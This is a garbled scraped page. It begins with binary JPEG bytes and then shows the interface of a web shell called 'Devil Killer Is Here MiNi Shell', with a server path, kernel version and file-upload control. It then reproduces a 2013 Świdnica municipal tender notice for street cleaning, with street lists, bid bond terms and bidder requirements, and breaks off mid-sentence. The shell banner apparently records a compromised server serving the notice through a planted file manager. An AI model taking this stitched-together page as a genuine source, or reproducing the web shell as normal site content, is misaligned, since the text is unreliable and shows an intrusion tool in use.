JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130606/218152-N-2013.html

<p class="kh_header"><b>Świdnica: Oczyszczanie dróg gminnych miasta Świdnica, na których częściowo dopuszczono prawo parkowania samochodów</b><br>
<b>Numer ogłoszenia: 218152 - 2013; data zamieszczenia: 06.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oczyszczanie dróg gminnych miasta Świdnica, na których częściowo dopuszczono prawo parkowania samochodów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonywanie usług w zakresie oczyszczania dróg gminnych miasta Świdnica, na których częściowo dopuszczono prawo parkowania samochodów.
3.2 Wspólny Słownik Zamówień CPV: 90.61.00.00-6 - Usługi sprzątania i zamiatania ulic
3.3 Zakres prac obejmuje:
- oczyszczanie dróg w Rynku i strefie centralnej miasta ( zadanie A )
- oczyszczanie dróg w strefie śródmiejskiej i peryferyjnej miasta ( zadanie B )
3.4 Wykonawca składa ofertę łączną na zadanie A i B.
ZADANIE A Oczyszczanie dróg w Rynku i strefie centralnej miasta.
1. Oczyszczanie dróg  w Rynku i strefie centralnej miasta będzie realizowane poprzez zamiatanie, zbieranie odpadów komunalnych oraz usuwanie odchodów zwierzęcych 
2. Oczyszczanie  będzie  realizowane przez cały okres trwania umowy z wyjątkiem dni w których będą występowały niekorzystne warunki atmosferyczne np. duże opady deszczu, śniegu lub niskie temperatury. W takich warunkach Zamawiający może zawiesić wszystkie prace w zakresie oczyszczania lub tylko prace w zakresie zamiatania.
3. W sezonie letnim ( od m-ca lipca do m-ca października ) zamiatanie dróg powinno być zakończone do godz. 6.30.
W sezonie zimowym ( od m-ca listopada do m-c grudnia ) zamiatanie dróg  powinno być zakończone do godz. 9.00.
W sezonie letnim i zimowym oczyszczanie dróg  polegające na zbieraniu odpadów komunalnych powinno być wykonywane w godzinach popołudniowych od 14.00 do 16.00 z wyjątkiem niedziel, w których prace należy wykonywać w godzinach rannych od 7.00 do 9.00. 
Usuwanie odchodów zwierzęcych będzie wykonywane  zarówno w czasie przewidzianym dla prac w zakresie zamiatania jak również zbierania odpadów komunalnych.
4. W uzasadnionych przypadkach Zamawiający pozostawia sobie prawo zmiany harmonogramu prac w zakresie oczyszczania ulic.
   5. Oczyszczanie w sezonie letnim
Zakres prac jest następujący:
a/oczyszczanie jezdni, chodników, placów, ciągów pieszo -jezdnych poprzez zamiatanie wszelkich nieczystości  oraz usuwaniu odchodów zwierzęcych. 
Przedmiar prac oraz częstotliwość zamiatania zawiera rozdział 24 SIWZ zadanie A pkt  1 i 2.
b/ oczyszczanie jezdni, chodników, placów, zatok  poprzez zbieranie odpadów komunalnych ( kubki, szkło, tworzywa sztuczne, papiery itp. ) oraz usuwanie odchodów zwierzęcych.
Przedmiar prac oraz częstotliwość oczyszczania zawiera rozdział 24 SIWZ zadanie A  pkt 3 i 4.
6. Oczyszczanie  w sezonie zimowym
W okresie zimowym w zależności od panujących warunków atmosferycznych Zamawiający będzie decydował o rodzaju podejmowanych prac w zakresie oczyszczania jezdni, chodników, placów, zatok, ciągów pieszo - jezdnych w Rynku i strefie centralnej miasta. 
Zakres prac jest następujący:
a/ w okresie bezśnieżnym przy występowaniu sprzyjających warunkach atmosferycznych  prace będą realizowane w sposób opisany jak w pkt  5 a i b.
b/ w czasie utrzymywania się pokrywy śnieżnej prace polegające na zbieraniu odpadów komunalnych opisane w pkt. 5 b będą wykonywane na pisemne polecenie Dyrektora  Departamentu Komunikacji.
Polecenie będzie zawierało informację dotyczącą przedmiaru robót i terminu wykonania.
7.  Oczyszczanie o którym mowa w zadaniu A  realizowane poprzez: 
a ) zamiatanie wszelkich nieczystości oraz usuwanie odchodów zwierzęcych będzie wykonywane zgodnie z harmonogramem z wyjątkiem dni świątecznych. Prace przewidziane do wykonania w dni świąteczne będą wykonywane w pierwszym dniu  roboczym występującym po dniu świątecznym,
b) zbieranie odpadów komunalnych oraz usuwanie odchodów zwierzęcych będzie wykonywane  również w dni świąteczne. 
 Zadanie B Oczyszczanie dróg w strefie śródmiejskiej i peryferyjnej miasta
1. Oczyszczanie dróg w strefie śródmiejskiej i peryferyjnej będzie realizowane poprzez zamiatanie wszelkich nieczystości oraz usuwanie odchodów zwierzęcych.
2. Oczyszczanie  będzie  realizowane przez cały okres trwania umowy z wyjątkiem dni w których będą występowały niekorzystne warunki atmosferyczne np. duże opady deszczu, śniegu lub niskie temperatury. W takich warunkach Zamawiający może zawiesić prace w zakresie  zamiatania.
3. W okresie  letnim ( od m-ca lipca do m-ca października )  zamiatanie dróg powinno być zakończone do godz 6.30 
W okresie zimowym ( od m-ca listopada do grudnia )  zamiatanie dróg powinno być zakończone do godz. 9.00.    
W uzasadnionych przypadkach Zamawiający pozostawia sobie prawo zmiany harmonogramu prac w zakresie oczyszczania ulic.
4. Oczyszczanie w sezonie  letnim polega na zamiataniu wszelkich nieczystości z powierzchni jezdni, zatok, parkingów i chodników wraz z usuwaniem odchodów zwierzęcych.
Przedmiar prac i częstotliwość zamiatania zawiera rozdział 24 SIWZ zadanie B pkt. 1 i 2.
5. Oczyszczanie w sezonie zimowym
W okresie bezśnieżnym przy występowaniu sprzyjających warunkach atmosferycznych  prace będą realizowane w sposób opisany jak w pkt  4.
W okresie zimowym w zależności od panujących warunków atmosferycznych Zamawiający będzie decydował o rodzaju podejmowanych prac w zakresie oczyszczania jezdni w strefie śródmiejskiej i peryferyjnej miasta.
6. Prace o których mowa w zadaniu B będą wykonywane zgodnie z harmonogramem z wyjątkiem niedziel i dni świątecznych.
Prace przewidziane do wykonania w dni świąteczne będą wykonane w pierwszych dwóch dniach  roboczych występujących po dniu świątecznym
WYKAZ  DRÓG GMINNYCH  DO  OCZYSZCZANIA  NA  KTÓRYCH CZĘŚCIOWO  DOPUSZCZONO PRAWO PARKOWANIA  SAMOCHODÓW
ZADANIE A RYNEK I STREFA CENTRALNA
1.Częstotliwość zamiatania - 5 razy w tygodniu ( poniedziałki, środy czwartki, piątki i soboty )

                                                                                                                                                                                               powierzchnia w m2 

1) Rynek - jezdnia						-		  5753
2) Rynek - chodniki						-		  4866
3) Świętokrzyska - ciąg pieszy				-		   346
4) Łukowa - jezdnia i ciąg pieszo-jezdny			-		  1451
5) Zaułek Kupiecki - ciąg pieszo jezdny			-		   469
6) Plac przed Halą Targową	wraz
 z przylegającym chodnikiem					-		   829
7) Pl. Grunwaldzki od Budowlanej do
   Al. Niepodległości - jezdnia					-		   452
8) Pl. Grunwaldzki- parking przed Sądem			-		   640
9) Franciszkańska - jezdnia 					-		  1011
10) Grodzka - jezdnia						-		  1384
 - chodnik Grodzka 7-13					-		      50 
11) Kotlarska - jezdnia wraz z przejściem
 Kotlarska-Grodzka 						-		  1797
                                                                                                                                  ________
Razem 										19 048 m2



2. Częstotliwość zamiatania - 2 razy w tygodniu ( poniedziałki i piątki )
 
                                                                                                                   powierzchnia w m2

1) Budowlana - jezdnia					-		  694 
2) Bohaterów Getta- jezdnia 					-		 1526
3) Daleka - jezdnia						-		  557
4) Spółdzielcza- jezdnia 					-		 2204
5) Siostrzana - jezdnia 					-		 1591
6) Konopnickiej - jezdnia					-		 5127
7) Mennicka - jezdnia						-		  539 
8) Teatralna - jezdnia						-	             1558
9) Pl. Św. Małgorzaty - jezdnia na wysokości
budynków 1-4, 5-6, 7-8, 10-14, 19-22	oraz 
pomiędzy skwerami przy Pub Bunkier			-		 5374                                                       
10) Żeromskiego - jezdnia między Kotlarską
a Budowlaną 							-	               823
11) Żeromskiego - jezdnia między Muzealną 
a Zamkową							-		 290
12) Żeromskiego - zatoka między budynkami 24-40			-		 770                                                     
13) Żeromskiego- zatoka między Kotlarską a Placem
Grunwaldzkim							-		 830
14) Pl. Grunwaldzki- zatoka od Klubu Bolko
do Apteki na Żeromskiego						-		 324
15) Pl. Grunwaldzki - parking przed WKU				-		1070
16) Al. Niepodległości- zatoka między Placem
Grunwaldzkim a Trybunalską					-		 692
17) Al. Niepodległości - zatoka między Placem
Grunwaldzkim a Nauczycielską					-		 577
18) Kościelna - jezdnia						-		3292
19) Dworcowa - jezdnia 						-		1551
20) Różana - jezdnia 							-		 895
21) Przechodnia - jezdnia 						-		 451
22) Komunardów - lewy pas jezdni
 od Zamkowej do Żeromskiego					-		1476
23) Szpitalna- jezdnia 							-		 977
24) Trybunalska- jezdnia						-		1098
25) Długa- jezdnia							-		3095 
26) Pułaskiego - jezdnia						-		3471
27) Środkowa - jezdnia 						-		543
28) Zamkowa - jezdnia 						-		1162
29) Pl. Jana Pawła II							-		1714
                                                                                                                                         _______
Razem                                                                                                                              44 271 m2 
                                                                                                                                                  													                                                                       
	 
3. Wykaz dróg do oczyszczania poprzez zbieranie 7 razy w tygodniu ( od poniedziałku do niedzieli)  odpadów komunalnych  ( folie, papiery, opakowania plastikowe, butelki itp. ) oraz 
usuwanie odchodów zwierzęcych


                                                                                                                             powierzchnia w m2

1) Rynek - jezdnia i chodniki						-		10619
2) Łukowa - jezdnia i ciąg pieszo-jezdny				-		 1451
3) Zaułek kupiecki - ciąg pieszo- jezdny				-		  469
4) Plac przed Halą Targową	wraz z przylegającym
 chodnikiem			                  				-		  829
5) Pl. Grunwaldzki - jezdnia od Budowlanej 
  do Al. Niepodległości oraz chodnik od Zaułka
  Kupieckiego do Klubu Bolko						-		  452
6) Wewnętrzna - jezdnia						-		  207
7) Świętokrzyska- ciąg pieszy 						-		  346
8) Pl. Grunwaldzki - parking przed Sądem				-		  640
9) Grodzka - jezdnia i chodniki					-		 2447
10) Franciszkańska - jezdnia i chodniki				-		 1633
11) Kotlarska - jezdnia i chodniki wraz z 
przejściem Kotlarska-Grodzka					-		 2884
12) Zamkowa - jezdnia i chodniki					-		 1976
13) Trybunalska - jezdnia i chodniki					-		 1866

14) Plac Jana Pawła II - jezdnia i chodniki
z wyłączeniem chodnika przy skwerze				-		 1906          
15) Długa- jezdnia i chodniki						-		 7095	
16) Pułaskiego - jezdnia i chodniki					-		 5979	
17) Spółdzielcza- jezdnia i chodniki					-		 3267
18) Kościelna - jezdnia i chodniki
z wyjątkiem chodnika przy murze kościoła				-		 4979
19) Konopnickiej - jezdnia i chodniki
z wyłączeniem chodników przy skwerach				-		 7941                                                            
20) Dworcowa - jezdnia i chodniki					-	      	 2267
                                                           						          _______
Razem                                                     				           	       59 253 m2
                                                           



4. Wykaz dróg do oczyszczania poprzez zbieranie 5 razy w tygodniu ( poniedziałki, wtorki, czwartki, piątki i soboty ) odpadów komunalnych ( papiery, folie, opakowania plastikowe, butelki itp. ) oraz usuwanie odchodów zwierzęcych

                                                                                                                                                                                            powierzchnia w m2

1) Środkowa - jezdnia i chodniki				-		 829 
2) Budowlana - jezdnia i chodniki				-		1321
3) Boh. Getta- jezdnia i chodniki				-		2200
4) Daleka - jezdnia i chodniki					-		 748
5) Klasztorna - jezdnia					-		 165
6) Siostrzana -jezdnia, chodnik i zatoka			-		 736
7) Mennicka- jezdnia i chodnik				-		1006
8) Teatralna - jezdnia i chodnik				-		2358
9) Pl. Św. Małgorzaty - jezdnia i chodniki
przy budynkach 1-4, 5-6, 7-8, 10-14, 19-22			-		6279
10) Żeromskiego - chodnik i zatoka między
kotlarską a Pl. Grunwaldzkim				-		1334 
11) Żeromskiego - jezdnia między Kotlarską
a Budowlaną							-		 823
12) Żeromskiego - jezdnia między
Muzealną a Zamkową 					-		 290
13) Żeromskiego - chodnik po stronie 
budynków 8-16, 24-40						-		 833
14) Żeromskiego - zatoka między
budynkami 24-40						-		 770 
15) Al. Niepodległości - chodnik i zatoka 
między Pl. Grunwaldzkim a Trybunalską			-		1097
16) Al. Niepodległości - chodnik i zatoka 	
miedzy Pl. Grunwaldzkim a Nauczycielską			-		1067
17). Wałbrzyska - chodnik od Pl. Grunwaldzkiego 
do przejazdu kolejowego					-		 743
18) Szpitalna - jezdnia i chodnik				-		1572
19. Długa - droga wzdłuż posesji Długa 72
koło Urzędu Miar 						-		147
20) Różana - jezdnia i chodnik				-		1528

21) Przechodnia - jezdnia i chodnik					-		 697
22) Komunardów - chodnik od Zamkowej 
do  Żeromskiego - lewa strona 					-		 773
23) Komunardów - chodnik od Konopnickiej 
do Ks. Bolko - prawa strona 						-		 886
24) ul. Komunardów - jezdnia od Zamkowej
do Żeromskiego							-		2600    
25) Pl. Grunwaldzki - chodnik od Żeromskiego
do Wałbrzyskiej  							-		  409
26) Pl. Grunwaldzki - parking i chodnik
 przed WKU								-		 1491
27) Pl. Grunwaldzki - chodnik i zatoka od 
Klubu Bolko do Apteki na Żeromskiego 				- 		  656
28) ul. Pańska - teren utwardzony					-		 1008
29) Kolejowa -- chodnik od Wałbrzyskiej do Spacerowej
 - lewa str. drogi							-		 646 
                                                            							_____                                                         
Razem                                                     					        35 012 m2
       									


ZADANIE B STREFA ŚRÓDMIEJSKA I PERYFERYJNA

WYKAZ DRÓG DO OCZYSZCZANIA

1. Częstotliwość zamiatania- dwa razy w tygodniu 

                                                                                                                              powierzchnia w m2

1) Klasztorna -jezdnia 					 	-	              165
2) Jagiellońska - jezdnia z zatokami					-		3824
3) Ks. Bolko -jezdnia z zatokami					-		2675
4) Ks. Agnieszki - jezdnia						-		1057
5) Równa -jezdnia							-		3265
6) Nauczycielska -jezdnia z zatokami					-		2640
7) Traugutta -jezdnia z zatokami					-		2440
8) Lelewela-jezdnia wraz z drogą dojazdową
   do Straży Pożarnej							-		3460
                                                           							_____
Razem                                                    						          19 526 m2

2.Częstotliwość zamiatania - jeden raz w tygodniu

1) Folwarczna -jezdnia						-		1028
2) Plac Drzymały -jezdnia						-		1986
3) Główna-jezdnia							-		1385
4) Kwiatowa -jezdnia							-		693
5) Wyspiańskiego -jezdnia						-		1530
6) Bracka -jezdnia							-		1139
7) Głowackiego - od Wałbrzyskiej do Niecałej
 - lewy pas jezdni wraz z parkingiem					-		2104

8) Pl. Tysiąclecia-jezdnia						-		1898
9) Boczna-jezdnia							-		1102
10) Tołstoja--jezdnia							-		2450
11) Langiewicza -jezdnia z zatokami					-		1146
12) Sienna -jezdnia							-		555
13) Plac przed Starostwem Powiatowym				-		4415
14) Miernicza	-jezdnia						-		588
15) Biberaska	-jezdnia						-		675
16) Boduena -jezdnia 							-	           1770
17) Stawki -jezdnia							-		651
18) Rycerska -jezdnia							-	           1120
19) Czwartaków -jezdnia						-		420
20) Warszawska -jezdnia						-		1148
21) Dębowa -jezdnia z zatokami					-		1216
22) Klonowa -jezdnia z zatokami					-		1704
23) Kołłątaja -jezdnia							-		1804
24) Świętojańska -jezdnia						-		1560
25) Poznańska	 -jezdnia						-		627
26) Słowackiego -jezdnia						-		1301
27) Kolejowa - chodnik od Wałbrzyskiej do Spacerowej 
- lewa str. drogi							-		 646 
28) Bema -jezdnia z zatokami						-		1922
29) Brodatego	-jezdnia z zatokami					-		5642
30) Łokietka -jezdnia z zatokami					-		4529
31) Galla Anonima -jezdnia						-		1977
32) Długosza -jezdnia z zatokami					-		765
33) Niemcewicza -jezdnia						-		872
34) Księżnej Jadwigi Śląskiej	-jezdnia z zatokami			-		2314
35) Wałowa -jezdnia z zatokami					-		481
36) Waryńskiego -jezdnia z zatokami					-		9012
37) Paderewskiego -jezdnia z zatokami				-		4127 
38) Czecha - odcinek  jezdni od Paderewskiego 
do Kusocińskiego							-		310 
39) Jasińskiego-jezdnia z zatokami					-		1532
40) Wróblewskiego - jezdnia wraz zatokami
oraz droga dojazdowa do posesji 62-64				-		4428 	
41) Okrężna - odcinek jezdni od Kliczkowskiej
 do budynku nr 5							-		1185
42) Okrężna - zatoki parkingowe					-		467 
43) Słobódzkiego - jezdnia wraz z zatokami
- droga dojazdowa do posesji 48-50					-		4571
44) Dąbrowskiego - jezdnia wraz zatokami				-	           10091
45) Prądzyńskiego 
- od Wyszyńskiego do Dąbrowskiego - prawa 
strona jezdni z zatokami						-		3326
- miejsca parkingowe wokół wysepki koło
 wieży ciśnień 								-		1086
- odcinek jezdni wraz z zatokami od Langiewicza do 
Wyszyńskiego wraz z wjazdem przy budynku nr 13			-		2703 	
- wjazdy między budynkiem  43-69,79-107				-		1146
46) Marcinkowskiego - od Riedla do E. Plater -
- prawa strona jezdni							-		3815
47) Plac  Piłsudskiego	-jezdnia wraz z zatokami			-		2992
48) Szymanowskiego -jezdnia						-		1227
49) Moniuszki -jezdnia						-		1270
50) Letnia -jezdnia							-		400
51) Francuska -jezdnia						-		672
52) Zamenhofa - parking przed budynkiem 49-51
oraz budynkiem 53-55							-		2148
53) Zamenhofa - parking przed przychodnią NZOZ			-		651
54) Podchorążych -jezdnia						-		1489
55) Hetmańska -jezdnia 						-		2128
56) Okulickiego - jezdnia przed Sądem 
Rejonowym								-		550
57) Rolnicza - zatoki							-		220
58) Piotra Skargi - jezdnia z zatokami				-	           1660 	 
59) Webera -jezdnia 			 				-	           1900
60 ) Pileckiego-jezdnia							-                      1751
61) Miłego Dnia -jezdnia						-	          3696
62) Zygmuntowska -jezdnia						-	          1223
63) Morcinka	- jezdnia						-	            490
64) Kruczkowskiego - jezdnia						-	            542            						                                                                 __________
Razem                                                   						   127 971 m2.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art. 67 ust. 1 pkt. 6 ustawy PZP przewiduje  udzielenie zamówienia uzupełniającego stanowiącego nie więcej niż 3 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości :  4 000 zł ( słownie: cztery tysiące złotych ).
11.2 Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. przed 14.06.2013 r. przed godz. 8.30.
11.3 Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Pzp, z tym, że: 
a ) złożone w pieniądzu: przelewem na rachunek bankowy Zamawiającego w Banku PKO. 
S.A  I Oddział w Świdnicy  96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.   
b) złożone w gwarancjach ( bankowych, ubezpieczeniowych ):
z treści gwarancji winno wynikać bezwarunkowo ( na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą ) zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Pzp tj. w przypadku gdy Wykonawca:                                                                                               - odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, 
- w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie,
c) złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego jako depozyt, złożony  za potwierdzeniem , przed upływem terminu składania ofert.
d/ w przypadku złożenia wadium w formie innej niż pieniądz, dokument gwarancji/poręczenia wadialnego winien pod rygorem odrzucenia oferty wskazywać wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia w rozumieniu art. 23 ustawy Pzp. 
11.4. Dowód przelewu lub potwierdzenie depozytu ( oryginał ) należy dołączyć do oferty.
11.5. Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
11.6. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy , którego oferta została wybrana  jako najkorzystniejsza.
11.7  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
 11.8	Zamawiający zwraca wadium , na wniosek Wykonawcy , który wycofał ofertę przed
upływem terminu składania ofert.
11.9  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
c) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunków w wyżej wymienionym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykaże się wykonaniem lub wykonywaniem  głównych usług polegających na oczyszczaniu ulic i placów o wartości łącznej nie mniejszej niż  300 000 zł brutto,  w tym jedno zadanie na kwotę minimum 
100 000 zł brutto.
Opis dla potwierdzenia tego warunku powinien być zawarty w załączniku nr 2 do oferty Wykonawcy ( wzór załącznik C do SIWZ ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujący warunek:
                                                     
- dysponować sprzętem w celu realizacji zamówienia 
Zamawiający wymaga aby Wykonawca posiadał pojazd przystosowany do transportu odpadów komunalnych zabezpieczony przed wysypywaniem i rozwiewaniem odpadów o masie całkowitej powyżej 3,5 tony ( w opisie sprzętu należy podać sposób zabezpieczenia ) 
- posiadać zgodę podmiotu uprawnionego do zagospodarowania odpadów o kodzie
